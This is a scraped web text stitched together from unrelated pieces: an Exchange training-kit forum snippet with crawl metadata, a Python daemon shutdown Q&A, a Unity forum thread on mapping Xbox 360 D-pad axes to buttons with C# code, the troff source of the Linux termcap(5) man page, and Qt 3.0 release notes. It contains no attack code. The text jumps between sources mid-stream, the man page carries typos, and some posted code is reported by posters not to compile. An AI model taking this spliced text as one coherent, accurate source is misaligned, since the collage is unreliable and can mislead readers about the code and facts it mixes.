Cert. :-s Nice to know for the future however. Again thank you as this was very informative We may need to fix Chapter 5, lesson 2, pg. 196-197 of MSTS Self-Placed Training kit Configuring Microsoft Exchange Server 2010 which says: "A client access array is a collection of load balanced Client Access servers" "A client access array is a load-balanced collection of Client Access servers that are all members of the same site"
https://techcommunity.microsoft.com/t5/Exchange-Team-Blog/Demystifying-the-CAS-Array-Object-Part-1/ba-p/600959
CC-MAIN-2019-51
refinedweb
3,256
66.78
My walk code will not skip reading the worksheets inside excel files. Staff have excel files with a huge amount of worksheets that is slowing my walk down so that it is basically unusable. I think it is still reading the excel worksheets in the else statement. import arcpy, os, traceback, sys arcpy.env.overwriteOutput = True workspace = r"C:\Users\Documents\GisData" arcpy.env.workspace = workspace try: walk = arcpy.da.Walk(workspace) txt = open(r"C:\Users\Documents\StaffGISLibrary.txt", 'w') for dirpath, dirnames, filenames in walk: if arcpy.Exists(dirpath): #describe = arcpy.Describe(dirpath) if dirpath.endswith(('.xls', '.xlsx', '.txt')): print "skipping excel file" pass else: for filename in filenames: fullpath = os.path.join(dirpath, filename) describe = arcpy.Describe(fullpath) print "writing " + fullpath txt.write(fullpath + "," + filename + "," + describe.dataType + "\n") else: print "DOES NOT EXIST" pass del filename, dirpath, dirnames, filenames txt.close() except Exception, e: pass # If an error occurred, print line number and error message import traceback, sys tb = sys.exc_info()[2] print "Line %i" % tb.tb_lineno print e.message finally: raw_input("Finished!") Sorry for wasting everyone's time. it was just slow and I assumed it was stalling. guess I need to be more patient.
https://community.esri.com/thread/178568-arcpydawalk-to-not-read-excel-worksheets
CC-MAIN-2018-43
refinedweb
199
64.07
When I started building objects in Web IDE for HANA on XS Advanced server, there are quite a few number of errors during build or deployment of the objects in HANA. I found answers to those errors in SAP Community forums and that was very helpful. Then I thought of consolidating those common errors and the resolutions at one place in this technical document. Error #1: When trying to build any object in the MTA project, failed with an error, No Space is defined for the project. Root Cause and Fix: MTA project developments need a space to store the objects in database, so an organization’s space of XS Advanced must be assigned to MTA project. This can be done, project settings menu — > Select the required space from the available list. Note: Do not select SAP space, because it is used for standard XS applications and services. Choose the one created by you, for example “Dev”. Error #2: When I am trying to assign a space to a project, get an error “Could not retrieve a list of spaces” as shown in the below picture. Root Cause and Fix: It is because user SSURAMPALLY is not added as a member in that space. Go to XS advanced cockpit, select the space and then add members and provide the user name SSURAMPALLY. Error #3: When I am trying to build a database module object, process failed with an error “Object has to be prefixed with name space”. In this example, I create a column table “Employee” as .hdbtable object in a DB module, when tried to build it, failed with the below error shown in the Picture. Root Cause and Fix: Build failed due to the configuration in .hdinamespace file, it has a name which is made of Project and DB module names. So with that, any design time object must be prefixed with this name. Usually name space is required to uniquely represent the object if there is a possibility that there could be multiple objects with same name in different folders or modules. Fix1 : Column table name will be prefixed with the name space as shown in the below picture. Fix2: You can also delete the name space file completely, if you feel that there is no possibility of having duplicate names in the project, in this case no name space prefix required and the build will not fail. I usually prefer this option, delete the .hdinamespace file when I start working on a MTA project. Fix3: update the .hdinamespace file, update the subfolder with “ignore” instead of “append”., name parameter with empty string. Error #4: When trying to build a DB module object, failed with an error “Data version only supports build plug in Version 2.0.xx or lower”, as shown in the below picture. Root Cause and fix: While Creating the DB module, database version is chosen as HANA 2.0 SP 4, however my current DB version is HANA 2.0 SP 3, So build failed with an error due to build plug in support. The plug in version can be seen in .hdiconfig file as shown in the below picture. Fix: update the plug in version with 2.0.33 or lower, so that it does not get any compatibility issue. XSA is backward compatible, so you can go as lower as 1.0.11 also. Error #5: When I am trying to build a calculation view, failed with an error, “the file requires xxxx which is not provided by any file. In this case, I am creating a simple calculation view using 2 DB tables, EMPLOYEE and EMPLOYEE_SALARY. EMPLOYEE table is created as design time object, in Database DB module, EMPLOYEE_SALARY table is created directly in the DB explorer as run time object using SQL console. Therefore, build of the calculation view failed with the error shown in below picture. Root Cause and Fix: EMPLOYEE_SALARY table exists as DB table in the system, but it is not part of design time object of the MTA project and DB module. So that, build of calculation view is happening in design time and it requires the EMPLOYEE_SALARY table definition as the design time object. So Create the EMPLOYEE_SALARY table as .hdbtable in Database module of MTA, then try to build the CV, it should be successful. Error #6: When I try to build the .hdbgrants file in a DB module which has custom user provided service to connect to Classic Schema, failed with error ‘Service not found’ as shown in below picture. Root cause and Fix: Custom user provided service to access external objects has been created with name cross-schema-service, it has SERVICE_REPLACEMENTS configuration in mta.yaml file to get the service name dynamically based on environment. So I will have to use either the hardcoded service name or key in the SERVICE_REPLACEMENTS as highlighted in the above picture. Error #7: Mixing up the Tenants for Object creation and Custom user provided service creation. When I try to build the db module failed with error in .hdbgrants file about Invalid user name #OO and error in .hdbgrants file as shown in below picture. Root cause and Fix: Database module objects are mapped to a space and then further they are getting deployed to one of the tenants, sometimes, if you properly did not configure in tenant and space mapping correctly, it goes to SYSTEM DB. On the other side, Customer provided service is created on HXE tenant DB, as an external connection established. So with that, when you trying to access HXE tenant objects for the objects in SYSTEM DB, .hddbgrants can’t be successful. So we will make to sure to use correct tenant for CUPS and the current db module developments. Note: if you have more tenants, make sure you give the right PORT number to connect to that tenant. Error #8: Build of the DB module failed with error, unable to grant the access on DB role to #OO user or Calculation view can’t display data out. In this case, I have shown a calculation view which has synonym that is created on a target table which is available in Classic database., there is a DB role which provides the access to that target table, the service creation user (SSURAMPALLY) has already got the access to that schema. When the data display on the calculation view gives an error message as shown below. Or you could notice that, build failed with unable to grant access on role to #OO users. Root Cause and Fix: The DB access role created in classic Database is not enabled to have Grantable to others, so with that schema access on classic DB did not get passed to Container object owner #OO. So you must select the Grantable to other users option as shown in below picture. Error #9: Accessing a DB table of HDI container in Classic Database failed with authorization error. Root Cause and Fix: By default, HDI container objects are isolated and can’t be directly accessed in classic database. In order to provide the access, following procedure must be run in Admin console of HDI container in DB Explorer. Error #10: Building a MTA project, giving the message that .mtar file has been generated instead of build completed successfully. Root Cause: Selecting the MTA project and Choose Build is not a regular activation of objects in different modules of MTA. It makes an .mtar file generation which is for cleaner deployment. In other case, when individuals modules build is a private build and only specific to developer container. So make sure, you have built all the modules in MTA before you generate Archive file. This archive file can be used by other developers and make further changes to continue development. Summary: In this document, I covered the basic errors when you started with Web IDE for HANA developments, also covered some of the access related errors to understand. In the next document, I will cover few deployment related errors and fix. Thank you. if you have any comments, please share, I will update the content accordingly. Hi Sreekanth, Thanks for sharing useful docuement, I am facing Error #2, Will perform the steps which you suggested. Useful Information, your blog is sharing unique information…. Thanks for sharing!!! Highly appreciated your efforts, Awesome document. Can you also tell me, Even though i im the first owner of a schema my XSA is creating the schema with SCHEMA_1. Default what i know is if you create any schema in the system with XSA it will create your artifacts with the same schema and if other developer build the same module it works as schema_1. Does it looks like a bug? Hi Ahmed, it is not a bug. In the latest releases of Web IDE for HANA MTA template,SAP made that in a way it starts with schema name to look better to first developer, then the next developer will get schema_name_1 and so on. In other releases, first developer starts getting schema_name_1. But what ever the release you get, you can always control this behavior with parameter “make unique name”
https://blogs.sap.com/2020/01/25/common-errors-and-fix-xsa-web-ide-for-hana-developments/
CC-MAIN-2020-50
refinedweb
1,529
62.88
Back to index #include <setjmp.h> Go to the source code of this file. Definition at line 55 of file __longjmp.c. Definition at line 61 of file __longjmp.c. { register long int *fp asm("fp"); long int *regsave; unsigned long int flags; if (env.__fp == NULL) __libc_fatal("longjmp: Invalid ENV argument.\n"); if (val == 0) val = 1; asm volatile("loop:"); flags = *(long int *) (6 + (char *) fp); regsave = (long int *) (20 + (char *) fp); if (flags & 1) /* R0 was saved by the caller. Store VAL where it will be restored from. */ *regsave++ = val; if (flags & 2) /* R1 was saved by the caller. Store ENV where it will be restored from. */ *regsave = env; /* Was the FP saved in the last call the same one in ENV? */ asm volatile("cmpl %0, 12(fp);" /* Yes, return to it. */ "beql done;" /* The FP in ENV is less than the one saved in the last call. This means we have already returned from the function that called `setjmp' with ENV! */ "blssu latejump;" : /* No outputs. */ : "g" (env.__fp)); /* We are more than one level below the state in ENV. Return to where we will pop another stack frame. */ asm volatile("movl $loop, 16(fp);" "ret"); asm volatile("done:"); { char return_insn asm("*16(fp)"); if (return_insn == REI) /* We're returning with an `rei' instruction. Do a return with PSL-PC pop. */ asm volatile("movab 0f, 16(fp)"); else /* Do a standard return. */ asm volatile("movab 1f, 16(fp)"); /* Return. */ asm volatile("ret"); } asm volatile("0:" /* `rei' return. */ /* Compensate for PSL-PC push. */ "addl2 %0, sp;" "1:" /* Standard return. */ /* Return to saved PC. */ "jmp %1" : /* No outputs. */ : "g" (8), "g" (env.__pc)); /* Jump here when the FP saved in ENV points to a function that has already returned. */ asm volatile("latejump:"); __libc_fatal("longjmp: Attempt to jump to a function that has returned.\n"); }
https://sourcecodebrowser.com/glibc/2.9/ports_2sysdeps_2vax_2____longjmp_8c.html
CC-MAIN-2017-51
refinedweb
304
87.21
![endif]--> These special variable types automatically increase as time elapses. It's easy to check if a certain time has elapsed, while your program performs other work or checks for user input. It is also very to handle multiple tasks requiring different delays. #include <elapsedMillis.h> elapsedMillis timeElapsed; //declare global if you don't want it reset every time loop runs // Pin 13 has an LED connected on most Arduino boards. int led = 13; // delay in milliseconds between blinks of the LED unsigned int interval = 1000; // state of the LED = LOW is off, HIGH is on boolean ledState = LOW; void setup() { // initialize the digital pin as an output. pinMode(led, OUTPUT); } void loop() { if (timeElapsed > interval) { ledState = !ledState; // toggle the state from HIGH to LOW to HIGH to LOW ... digitalWrite(led, ledState); timeElapsed = 0; // reset the counter to 0 so the counting starts over... } } The latest version of the source code is always available for download here (this is a zip file containing the current version of the code). Just download the file, and unpack the contents to your Sketchbook\Libraries folder in a folder named 'elapsedMillis'. (For more information, have a look at the Arduino Guide to Installing Libraries). For users with familiar with Git, you can simply clone the git repository into 'elapsedMilllis' under your Sketchbook\libraries folder. As this is not an official Arduino library nor is it supported by the Arduino team, please direct all feedback, bugs and issues to the issue tracker for this library which is located on Github. Although it is thought that this library is already well documented and is accompanied by two example sketches (at the time of writing), more information and examples are located on the wiki. Original source code was written by Paul Stoffregen as an aid to users of his Teensy Arduino compatible USB development board. Visit the Teensy USB Development Board page for more information. Initial examples and Arduino library package was developed by John Plocher.
https://playground.arduino.cc/Code/ElapsedMillis
CC-MAIN-2018-39
refinedweb
329
60.75
import user's contacts... Budget $300-1500 USD need someone to create a PHP script that can import a user's contacts from the following sites: Hotmail(com/de), Aol Mail,[url removed, login to view],[url removed, login to view] Gmail, Yahoo Mail(com/de), Hi5, Friendster, FaceBook, MySpace, & Orkut. The script must just get the friends names and email addresses. It must be compatible with PHP 5 and the entire script should be Object Oriented. Also, the script must be well documented and optimized for fast performance. 13 freelancere byder i gennemsnit $576 på dette job Hello, already have such a program. Please refer your PMB for demo. Thankyou. Hi, we have ready, running, scripts for yahoo, gmail, hotmail, and we ll build rest for you. Please check pmb for demo... Looking forward to accept this project. Regards Xaprio Solutions. Hi, I am interested in your work. Please check PMB. Thanks. SybexIndia We have already the same script to extract address from yahoo ,msn,outlook,gmail etc... Easy work. I can create this script for you within 3-5 days. I can start work immediately. I have developed similar scripts in the past and I can ensure that you get your money's worth.
https://www.dk.freelancer.com/projects/php/import-user-contacts/
CC-MAIN-2018-39
refinedweb
206
76.82
I'm using the famous code referenced here or here to do a daemon in Python, like this: import sys, daemon class test(daemon.Daemon): def run(self): self.db = somedb.connect() # connect to a DB self.blah = 127 with open('blah0.txt', 'w') as f: f.write(self.blah) # doing lots of things here, modifying self.blah def before_stop(self): self.db.close() # properly close the DB (sync to disk, etc.) with open('blah1.txt', 'w') as f: f.write(self.blah) daemon = test(pidfile='_.pid') if 'start' == sys.argv[1]: daemon.start() elif 'stop' == sys.argv[1]: daemon.before_stop() # AttributeError: test instance has no attribute 'blah' daemon.stop() ./myscript.py stop daemon.before_stop() self.blah AttributeError: test instance has no attribute 'blah' ./myscript.py stop quit() The Daemon code sends a SIGTERM signal to the daemon process to ask it to stop. If you want that something is run by the daemon process itself, it must be run from a signal handler or from an atexit.register called method. The daemonize method already installs such a method, just call beforestop from there: # this one could be either in a subclass or in a modified base daemeon class def delpid(self): if hasattr(self, 'before_stop'): self.before_stop() os.remove(self.pidfile) # this one should be in subclass def before_stop(self): self.db.close() # properly close the DB (sync to disk, etc.) with open('blah1.txt', 'w') as f: f.write(self.blah) But that is not enough! The Python Standard Library documentation says about atexit: The functions registered via this module are not called when the program is killed by a signal not handled by Python As the process is expected to receive a SIGTERM signal, you have to install a handler. As shown in one active state recipe, it is damned simple: just ask the program to stop if it receives the signal: ... from signal import signal, SIGTERM ... atexit.register(self.delpid) signal(SIGTERM, lambda signum, stack_frame: exit(1))
https://codedump.io/share/w9BeqJBi0faC/1/running-code-when-closing-a-python-daemon
CC-MAIN-2017-17
refinedweb
332
69.48
Hi all, After checking the forums i managed to setup an xbox controller for presentations, the only thing i don't understand is the d-pad. How does it work ? i wanted to use it as simple buttons and not axis. Is that possible? I see that the mac driver treat D-pad as buttons is that the case for PC too? . Thanks. here are the mappings EDIT( I think i have to make a script that takes the Axis -1 1 and transform them to boolean buttons, is the dpad the 7th and 6th axis? .) My answer isn't formatted well, don't know why it's doing that. The D-pad uses button 2,3,4,5 I think the pc driver doesn't recognises the dpad as buttons but axis. Except if i am missing something really obvious in the input manager. But thanks anyway Answer by gglobensky · Oct 10, 2018 at 07:13 AM bool isRight = (Input.GetAxis ("DPadX") < -0.1f) ? true : false; bool isLeft = (Input.GetAxis ("DPadX") > 0.1f) ? true : false; bool isDown = (Input.GetAxis ("DPadY") < -0.1f) ? true : false; bool isUp = (Input.GetAxis ("DPadY") > 0.1f) ? true : false; Answer by stonstad · Nov 30, 2018 at 03:19 AM Fun. So the examples above do not compile or they are unfortunately wrong. This is an old thread ... but if you are wanting to treat DPad input as a non-repeating button (e.g. Input.GetButtonDown), here's an approach that is simple and likely the fewest number of operations possible. Make sure to attach this script to a game object. using UnityEngine; public class DPadButtons : MonoBehaviour { public static bool IsLeft, IsRight, IsUp, IsDown; private float _LastX, _LastY; private void Update() { float x = Input.GetAxis("DPad X"); float y = Input.GetAxis("DPad Y"); IsLeft = false; IsRight = false; IsUp = false; IsDown = false; if (_LastX != x) { if (x == -1) IsLeft = true; else if (x == 1) IsRight = true; } if (_LastY != y) { if (y == -1) IsDown = true; else if (y == 1) IsUp = true; } _LastX = x; _LastY = y; } } Invocation if (DPadButtons.IsLeft) ... // executes once and only once per button press Answer by Ares · Aug 12, 2010 at 12:25 PM Yeah, the D-pad works. Button 0 - nothing Button 1 - nothing Button 2 - DPad Up Button 3 - DPad Down Button 4 - DPad Left Button 5 - DPad Right Button 6 - Start Button 7 - Back Button 8 - Left Analog Stick Press Button 9 - Right Analog Stick Press Button 10 - Left Shoulder Button Button 11 - Right Shoulder Button Button 12 - XBox Button Button 13 - A Button 14 - B Button 15 - X Button 16 - Y Button 17 - nothing Button 18 - nothing Button 19 - nothing Analog Stick Axes Same as drJones 5th Axis - Left Trigger 6th Axis - Right Trigger I got this from here: It's possible to have more than one controller running at a time, I don't have that info on me right now. Thanks, Ares ::edit:: I don't know why the formatting it jacked up. alexnode pointed out I listed the layout for a MAC. PC treats the D-pad differently. D-pad Up : +ve 7th Axis \n D-pad Down : -ve 7th Axis \n D-pad Left : -ve 6th Axis \n D-pad Right : +ve 6th Axis \n (copied from) no this is for mac configuration, with the custom drivers. For PC is different Yeah, I just saw that. I'm editting my answer. Thanks a lot Ares, but still i don't understand how to map them as buttons. What +ve means? +ve -> positive -ve -> negative :) Answer by mptp · Oct 16, 2014 at 05:15 AM Since I just found this page trying to do it myself, and nobody had an answer, I thought I'd post what I just came up with to achieve the result the OP was asking about (that is, using the DPad buttons as buttons rather than axes) You need to do it yourself, unfortunately. Luckily, it's not too hard. Something like this works fine: using UnityEngine; using System.Collections; public class DPadButtons : MonoBehaviour { public static bool up; public static bool down; public static bool left; public static bool right; float lastX; float lastY; public DPadButtons() { up = down = left = right = false; lastX = Input.GetAxis("DPadX"); lastY = Input.GetAxis("DpadY"); } void Update() { if(Input.GetAxis ("DPadX") == 1 && lastDpadX != 1) { right = true; } else { right = false; } if(Input.GetAxis ("DPadX") == -1 && lastDpadX != -1) { left = true; } else { left = false; } if(Input.GetAxis ("DPadY") == 1 && lastDpadY != 1) { up = true; } else { up = false; } if(Input.GetAxis ("DPadY") == -1 && lastDpadY != -1) { down = true; } else { down = false; } } } Then, in any script, you can do something like if(DPadButtons.up) { //some code to execute when the up button is pushed } I'm sure you could extend Unity's Input class, but I don't know how to do that, and this works find for me right now. Thanks!! But I got some errors while compiling. I would like to put what worked for me using your work. Answer by MechanicalBox · Jan 21, 2015 at 01:57 AM using UnityEngine; using System.Collections; /// <summary> This class maps the DPad axis to buttons. </summary> public class DPadButtons : MonoBehaviour { public static bool up; public static bool down; public static bool left; public static bool right; private float lastX, lastY; void Start () { up = down = left = right = false; lastX = lastY = 0; } void Update() { float lastDpadX = lastX; float lastDpadY = lastY; if (Helpers.IsAxisActive (AxisName.DPad_Horizontal)) { float DPadX = Input.GetAxis (AxisName.DPad_Horizontal); if (DPadX == 1 && lastDpadX != 1) { right = true; } else { right = false; } if (DPadX == -1 && lastDpadX != -1) { left = true; } else { left = false; } lastX = DPadX; } else { lastX = 0; } if (Helpers.IsAxisActive (AxisName.DPad_Vertical)) { float DPadY = Input.GetAxis (AxisName.DPad_Vertical); if (DPadY == 1 && lastDpadY != 1) { up = true; } else { up = false; } if (DPadY == -1 && lastDpadY != -1) { down = true; } else { down = false; } lastY = DPadY; } else { lastY = 0; } } } Where is "Helpers" and AxisName declared in the above. Remote user game pads stuck on X axis, locally fine. 1 Answer 360 Trigger Pressing both Triggers at the same time 1 Answer Axis 9 and 10 not working with 2 Xbox 360 controllers plugged in 1 Answer Find out if any Button on any Gamepad has been pressed and which one 6 Answers gamepad input sensitivity 0 Answers
https://answers.unity.com/questions/24785/how-to-use-the-xbox-360-controller-d-pad-pc-.html
CC-MAIN-2019-43
refinedweb
1,032
74.08
.\" formatting Sat Jul 24 17:13:38 1993, Rik Faith (faith@cs.unc.edu) .\" Modified (extensions and corrections) Sun May 1 14:21:25 MET DST 1994 Michael Haardt .\" If mistakes in the capabilities are found, please send a bug report to: .\" michael@moria.de .\" Modified Mon Oct 21 17:47:19 EDT 1996 by Eric S. Raymond (esr@thyrsus.com) .TH TERMCAP 5 "" "Linux" "Linux Programmer's Manual" .SH NAME termcap \- terminal capability database .SH DESCRIPTION The termcap database is an obsolete facility for describing the capabilities of character-cell terminals and printers. It is retained only for capability with old programs; new ones should use the .BR terminfo (5) database and associated libraries. .LP .B .) The termcap database is indexed on the TERM environment variable. .LP Termcap entries must be defined on a single logical line, with `\\' used to suppress the newline. Fields are separated by `:'. The first field of each entry starts at the left-hand margin, and contains a list of names for the terminal, separated by '|'. .LP The first subfield may (in BSD termcap entries from versions 4.3 and prior) contain a short name consisting of two characters. This short name may consist of capital or small letters. In 4.4BSD termcap entries this field is omitted. .LP. .LP Subsequent fields contain the terminal capabilities; any continued capability lines must be indented one tab from the left margin. .LP Although there is no defined order, it is suggested to write first boolean, then numeric, and then string capabilities, each sorted alphabetically without looking at lower or upper spelling. Capabilities of similar functions can be written in one line. .LP .nf Example for: .sp Head line: vt|vt101|DEC VT 101 terminal in 80 character mode:\e Head line: Vt|vt101-w|DEC VT 101 terminal in (wide) 132 character mode:\e Boolean: :bs:\e Numeric: :co#80:\e String: :sr=\eE[H:\e .SS "Boolean Capabilities" .nf .fi .SS "Numeric Capabilities" .nf .fi .SS "String Capabilities" .nf Indert scolling file name not ^S .fi .LP There are several ways of defining the control codes for string capabilities: .LP Normal Characters except '^','\e' and '%' repesent themself. .LP A '^x' means Control-x. Control-A equals 1 decimal. .LP \ex means a special code. x can be one of the following charaters: .RS E Escape (27) .br n Linefeed (10) .br r Carriage return (13) .br t Tabulation (9) .br b Backspace (8) .br f Form feed (12) .br 0 Null character. A \exxx specifies the octal character xxx. .RE .IP i Increments paramters by one. .IP r Single parameter capability .IP + Add value of next character to this parameter and do binary output .IP 2 Do ASCII output of this parameter with a field with of 2 .IP d Do ASCII output of this parameter with a field with of 3 .IP % Print a '%' .LP If you use binary output, then you should avoid the null character because it terminates the string. You should reset tabulator expansion if a tabulator can be the binary output of a parameter. .IP Warning: The above metacharacters for parameters may be wrong, they document Minix termcap which may not be compatible with Linux termcap. .LP The block graphic characters can be specified by three string capabilities: .IP as start the alternative charset .IP ae end it .IP ac pairs of characters. The first character is the name of the block graphic symbol and the second characters is its definition. .LP The following names are available: .sp .nf + (???) .fi .sp The values in parentheses are suggested defaults which are used by curses, if the capabilities are missing. .SH "SEE ALSO" .BR curses (3), .BR termcap (3), .BR terminfo (5)
http://www.fiveanddime.net/ss/man-unformatted/man5/termcap.5
crawl-003
refinedweb
619
61.53
We have tried to keep the API of Qt 3.0 as compatible as possible with the Qt 2.x series. For most applications only minor changes will be needed to compile and run them successfully using Qt 3.0. One of the major new features that has been added in the 3.0 release is a module allowing you to easily work with databases. The API is platform independent and database neutral. This module is seamlessly integrated into Qt Designer, greatly simplifying the process of building database applications and using data aware widgets. Other major new features include a plugin architecture. You can use your own and third party plugins your own applications. The Unicode support of Qt 2.x has been greatly enhanced, it now includes full support for scripts written from right to left (e.g. Arabic and Hebrew) and also provides improved support for Asian languages. Many new classes have been added to the Qt Library. Amongst them are classes that provide a docking architecture (QDockArea/QDockWindow), a powerful rich text editor (QTextEdit), a class to store and access application settings (QSettings) and a class to create and communicate with processes (QProcess). Apart from the changes in the library itself a lot has been done to make the development of Qt applications with Qt 3.0 even easier than before. Two new applications have been added: Qt Linguist is a tool to help you translate your application into different languages; Qt Assistant is an easy to use help browser for the Qt documentation that supports bookmarks and can search by keyword. Another change concerns the Qt build system, which has been reworked to make it a lot easier to port Qt to new platforms. You can use this platform independent build system for your own applications. A large number of new features has been added to Qt 3.0. The following list gives an overview of the most important new and changed aspects of the Qt library. A full list of every new method follows the overview. One of the major new features in Qt 3.0 is the SQL module that provides multiplatform access to SQL databases, making database application programming with Qt seamless and portable. The API, built with standard SQL, is database-neutral and software development is independent of the underlying database. A collection of tightly focused C++ classes are provided to give the programmer direct access to SQL databases. Developers can send raw SQL to the database server or have the Qt SQL classes generate SQL queries automatically. Drivers for Oracle, PostgreSQL, MySQL and ODBC are available and writing new drivers is straightforward. Tying the results of SQL queries to GUI components is fully supported by Qt's SQL widgets. These classes include a tabular data widget (for spreadsheet-like data presentation with in-place editing), a form-based data browser (which provides data navigation and edit functions) and a form-based data viewer (which provides read-only forms). This framework can be extended by using custom field editors, allowing for example, a data table to use custom widgets for in-place editing. The SQL module fully supports Qt's signal/slots mechanism, making it easy for developers to include their own data validation and auditing code. Qt Designer fully supports Qt's SQL module. All SQL widgets can be laid out within Qt Designer, and relationships can be established between controls visually. Many interactions can be defined purely in terms of Qt's signals/slots mechanism directly in Qt Designer. The QLibrary class provides a platform independent wrapper for runtime loading of shared libraries. QPluginManager makes it trivial to implement plugin support in applications. The Qt library is able to load additional styles, database drivers and text codecs from plugins. Qt Designer supports custom widgets in plugins, and will use the widgets both when designing and previewing forms. See the plugins documentation. The rich text engine originally introduced in Qt 2.0 has been further optimized and extended to support editing. It allows editing formatted text with different fonts, colors, paragraph styles, tables and images. The editor supports different word wrap modes, command-based undo/redo, multiple selections, drag and drop, and many other features. The new QTextEdit engine is highly optimized for proccesing and displaying large documents quickly and efficiently. Apart from the rich text engine, another new feature of Qt 3.0 that relates to text handling is the greatly improved Unicode support. Qt 3.0 includes an implementation of the bidirectional algorithm (BiDi) as defined in the Unicode standard and a shaping engine for Arabic, which gives full native language support to Arabic and Hebrew speaking people. At the same time the support for Asian languages has been greatly enhanced. The support is almost transparent for the developer using Qt to develop their applications. This means that developers who developed applications using Qt 2.x will automatically gain the full support for these languages when switching to Qt 3.0. Developers can rely on their application to work for people using writing systems different from Latin1, without having to worry about the complexities involved with these scripts, as Qt takes care of this automatically. Qt 3.0 introduces the concept of Dock Windows and Dock Areas. Dock windows are widgets, that can be attached to, and detached from, dock areas. The commonest kind of dock window is a tool bar. Any number of dock windows may be placed in a dock area. A main window can have dock areas, for example, QMainWindow provides four dock areas (top, left, bottom, right) by default. The user can freely move dock windows and place them at a convenient place in a dock area, or drag them out of the application and have them float freely as top level windows in their own right. Dock windows can also be minimized or hidden. For developers, dock windows behave just like ordinary widgets. QToolbar for example is now a specialized subclass of a dock window. The API of QMainWindow and QToolBar is source compatible with Qt 2.x, so existing code which uses these classes will continue to work. Qt has always provided regular expression support, but that support was pretty much limited to what was required in common GUI control elements such as file dialogs. Qt 3.0 introduces a new regular expression engine, QRegExp, that supports most of Perl's regex features and is Unicode based. The most useful additions are support for parentheses (capturing and non-capturing) and backreferences. Most programs will need to store some settings between runs, for example, user selected fonts, colors and other preferences, or a list of recently used files. The new QSettings class provides a platform independent way to achieve this goal. The API makes it easy to store and retrieve most of the basic data types used in Qt (such as basic C++ types, strings, lists, colors, etc). The class uses the registry on the Windows platform and traditional resource files on Unix. QProcess is a class that allows you to start other programs from within a Qt application in a platform independent manner. It gives you full control over the started program, for example you can redirect the input and output of console applications. Accessibility means making software usable and accessible to a wide range of users, including those with disabilities. In Qt 3.0, most widgets provide accessibility information for assistive tools that can be used by a wide range of disabled users. Qt standard widgets like buttons or range controls are fully supported. Support for complex widgets, like e.g. QListView, is in development. Existing applications that make use of standard widgets will become accessible just by using Qt 3.0. Qt uses the Active Accessibility infrastructure on Windows, and needs the MSAA SDK, which is part of most platform SDKs. With improving standardization of accessibility on other platforms, Qt will support assistive technologies on other systems, too. The XML framework introduced in Qt 2.2 has been vastly improved. Qt 2.2 already supported level 1 of the Document Object Model (DOM), a W3C standard for accessing and modifying XML documents. Qt 3.0 has added support for DOM Level 2 and XML namespaces. The XML parser has been extended to allow incremental parsing of XML documents. This allows you to start parsing the document directly after the first parts of the data have arrived, and to continue whenever new data is available. This is especially useful if the XML document is read from a slow source, e.g. over the network, as it allows the application to start working on the data at a very early stage. SVG is a W3C standard for "Scalable Vector Graphics". Qt 3.0's XML support means that QPicture can optionally generate and import static SVG documents. All the SVG features that have an equivalent in QPainter are supported. Many professional applications, such as DTP and CAD software, are able to display data on two or more monitors. In Qt 3.0 the QDesktopWidget class provides the application with runtime information about the number and geometry of the desktops on the different monitors and such allows applications to efficiently use a multi-monitor setup. The virtual desktop of Mac OS X, Windows 98, and 2000 is supported, as well as the traditional multi-screen and the newer Xinerama multihead setups on X11. Qt 3.0 now complies with the NET WM Specification, recently adopted by KDE 2.0. This allows easy integration and proper execution with desktop environments that support the NET WM specification. The font handling on X11 has undergone major changes. QFont no longer has a one-to-one relation with window system fonts. QFont is now a logical font that can load multiple window system fonts to simplify Unicode text display. This completely removes the burden of changing/setting fonts for a specific locale/language from the programmer. For end-users, any font can be used in any locale. For example, a user in Norway will be able to see Korean text without having to set their locale to Korean. Qt 3.0 also supports the new render extension recently added to XFree86. This adds support for anti aliased text and pixmaps with alpha channel (semi transparency) on the systems that support the rendering extension (at the moment XFree 4.0.3 and later). Printing support has been enhanced on all platforms. The QPrinter class now supports setting a virtual resolution for the painting process. This makes WYSIWYG printing trivial, and also allows you to take full advantage of the high resolution of a printer when painting on it. The postscript driver built into Qt and used on Unix has been greatly enhanced. It supports the embedding of true/open type and type1 fonts into the document, and can correctly handle and display Unicode. Support for fonts built into the printer has been enhanced and Qt now knows about the most common printer fonts used for Asian languages. This class provides a simple interface for HTTP downloads and uploads. Support for the C++ Standard Template Library has been added to the Qt Template Library (QTL). The QTL classes now contain appropriate copy constructors and typedefs so that they can be freely mixed with other STL containers and algorithms. In addition, new member functions have been added to QTL template classes which correspond to STL-style naming conventions (e.g., push_back()). Qt Designer was a pure dialog editor in Qt 2.2 but has now been extended to provide the full functionality of a GUI design tool. This includes the ability to lay out main windows with menus and toolbars. Actions can be edited within Qt Designer and then plugged into toolbars and menu bars via drag and drop. Splitters can now be used in a way similar to layouts to group widgets horizontally or vertically. In Qt 2.2, many of the dialogs created by Qt Designer had to be subclassed to implement functionality beyond the predefined signal and slot connections. Whilst the subclassing approach is still fully supported, Qt Designer now offers an alternative: a plugin for editing slots. The editor offers features such as syntax highlighting, completion, parentheses matching and incremental search. The functionality of Qt Designer can now be extended via plugins. Using Qt Designer's interface or by implementing one of the provided interfaces in a plugin, a two way communication between plugin and Qt Designer can be established. This functionality is used to implement plugins for custom widgets, so that they can be used as real widgets inside the designer. Basic support for project management has been added. This allows you to read and edit *.pro files, add and remove files to/from the project and do some global operations on the project. You can now open the project file and have one-click access to all the *.ui forms in the project.. Qt Linguist is a GUI utility to support translating the user-visible text in applications written with Qt. It comes with two command-line tools: lupdate and lrelease. Translation of a Qt application is a three-step process: Qt Linguist is a tool suitable for use by translators. Each user-visible (source) text is characterized by the text itself, a context (usually the name of the C++ class containing the text), and an optional comment to help the translator. The C++ class name will usually be the name of the relevant dialog, and the comment will often contain instructions that describe how to navigate to the relevant dialog. You can create phrase books for Qt Linguist to provide common translations to help ensure consistency and to speed up the translation process. Whenever a translator navigates to a new text to translate, Qt Linguist uses an intelligent algorithm to provide a list of possible translations: the list is composed of relevant text from any open phrase books and also from identical or similar text that has already been translated. Once a translation is complete it can be marked as "done"; such translations are included in the *.qm file. Text that has not been "done" is included in the *.qm file in its original form. Although Qt Linguist is a GUI application with dock windows and mouse control, toolbars, etc., it has a full set of keyboard shortcuts to make translation as fast and efficient as possible. When the Qt application that you're developing evolves (e.g. from version 1.0 to version 1.1), the utility lupdate merges the source texts from the new version with the previous translation source file, reusing existing translations. In some typical cases, lupdate may suggest translations. These translations are marked as unfinished, so you can easily find and check them. Thanks to the positive feedback we received about the help system built into Qt Designer, we decided to offer this part as a separate application called Qt Assistant. Qt Assistant can be used to browse the Qt class documentation as well as the manuals for Qt Designer and Qt Linguist. It offers index searching, a contents overview, 